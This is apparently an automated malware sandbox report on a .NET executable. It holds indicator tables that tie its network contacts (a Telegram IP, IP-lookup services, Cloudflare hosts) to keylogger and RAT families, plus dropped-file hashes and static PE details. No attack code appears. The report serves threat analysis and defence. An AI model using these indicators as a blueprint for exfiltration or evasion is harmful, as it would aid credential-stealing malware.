                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.101.57.9, 199.232.210.172, 199.232.214.172, 13.107.246.45, 184.28.90.27, 52.149.20.212
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Yef4EqsQha.exe, PID 7872 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        17:06:20API Interceptor6145675x Sleep call for process: Yef4EqsQha.exe modified
                                                                                        17:06:22API Interceptor13x Sleep call for process: powershell.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            104.21.112.19MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/qzi3/
                                                                                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.buyspeechst.shop/w98i/
                                                                                                            wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                            • beammp.com/phpmyadmin/
                                                                                                            193.122.6.168xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0017.t-0009.t-msedge.netQz8OEUxYuH.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.45
                                                                                                            ztcrKv3zFz.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.45
                                                                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.45
                                                                                                            3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 13.107.246.45
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 13.107.246.45
                                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            7cYDC0HciP.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            7cYDC0HciP.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            bg.microsoft.map.fastly.net25055222211104026628.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            10965191911914222758.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.210.172
                                                                                                            241198432146011036.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.210.172
                                                                                                            137112093815427392.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.210.172
                                                                                                            16529230753138817875.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.210.172
                                                                                                            2305511452193571644.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            1667730710460316051.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            2609231882173488714.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            11057252552282120022.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            3039412363370818030.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                            • 199.232.214.172
                                                                                                            reallyfreegeoip.orgb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.80.1
                                                                                                            UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.32.1
                                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.48.1
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.80.1
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.16.1
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.80.1
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.32.1
                                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.48.1
                                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.16.1

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ORACLE-BMC-31898USb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            9L83v5j083.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            y1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.130.0
                                                                                                            TELEGRAMRUb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.186.192
                                                                                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.80.1
                                                                                                            UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.48.1
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.32.1
                                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.48.1
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.80.1
                                                                                                            http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.16.1
                                                                                                            87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.80.1

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.112.1
                                                                                                            2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 104.21.112.1
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0e3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            87J30ulb4q.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                            Category:dropped
                                                                                                            Size (bytes):71954
                                                                                                            Entropy (8bit):7.996617769952133
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):328
                                                                                                            Entropy (8bit):3.230795304831838
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kK/e9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3BDImsLNkPlE99SNxAhUe/3
                                                                                                            MD5:DD8180A968BF3FDD1C2E95741B4A83C9
                                                                                                            SHA1:AD54358E5B2E7947F11EEA450A277EE947ADAA5B
                                                                                                            SHA-256:558510748953A4675BF8BE5FE38E24FC9EF8F45CE49DA0A023F7C1BC87FD83A4
                                                                                                            SHA-512:5CE4A6783DB2FB4C57A0CF1C1E96752FEBEBA0BBE850AC676DE0067E1B6845878562CACE7D47FBC7A304AD01D2C25054FDFC12DF442B2EE0BD4D50EACC979CED
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:p...... ..........?.l..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Yef4EqsQha.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1415
                                                                                                            Entropy (8bit):5.352427679901606
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                                                            MD5:97AD91F1C1F572C945DA12233082171D
                                                                                                            SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                                                            SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                                                            SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                                                            Malicious:true
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.380747059108785
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:lylWSU4y4RdymFoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:lGLHyIdvKLgZ2KRHWLOugss
                                                                                                            MD5:3200119B12511121F9F608784BE9A337
                                                                                                            SHA1:AA1FE8DAB7247C3F2D698790E786FFFFB54D71D4
                                                                                                            SHA-256:E996B4D99B21FD9CE93D7587637A91FE824452A920E339C9CCD100107F61C0D9
                                                                                                            SHA-512:9E14106945D945C9C63D0406D595DC41275B4ED16A7007888BCC8675A0DF3D829F7831E01449B9D6F41220234B56AEAF377E6EC72082C569551291F04C401B0A
                                                                                                            Malicious:false
                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...<...............i..VdqF...|...........System.Configuration@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdnngzyz.ht2.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvnqseku.25h.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gph3qvoi.kuv.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5ljvwbr.knq.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.608958923765637
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            File name:Yef4EqsQha.exe
                                                                                                            File size:865'792 bytes
                                                                                                            MD5:91ccccf28bcd650fc1f8e5256891211c
                                                                                                            SHA1:35ceec260d23f1aaa3b948060a0f4c5c926f9b73
                                                                                                            SHA256:f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897
                                                                                                            SHA512:6d9ef4683482a59ef0a25eb402a54bf27adc0039c1c474ef41ea4e4424796d33285cd3e1f8521ac3331990e288bf514a2abf5c83ab7fb7c5b37f865205ba05a5
                                                                                                            SSDEEP:12288:jMMy+nuP3eBfkS7MYDiyUKmBnjVlNqPFqQPuWZcWRmF1cmSKeE9pMFGwy9EXX+:4+0OZkTPyUPB5EGWZc+mFwKWFGwFO
                                                                                                            TLSH:5F05E0643B6DCB06C5394BF00970E6B813797D8AB811E30B6ED9BEDF7876B154A10683
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.................0..,..........JK... ...`....@.. ....................................@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4d4b4a
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0xA6F3EF70 [Sat Oct 5 00:46:40 2058 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
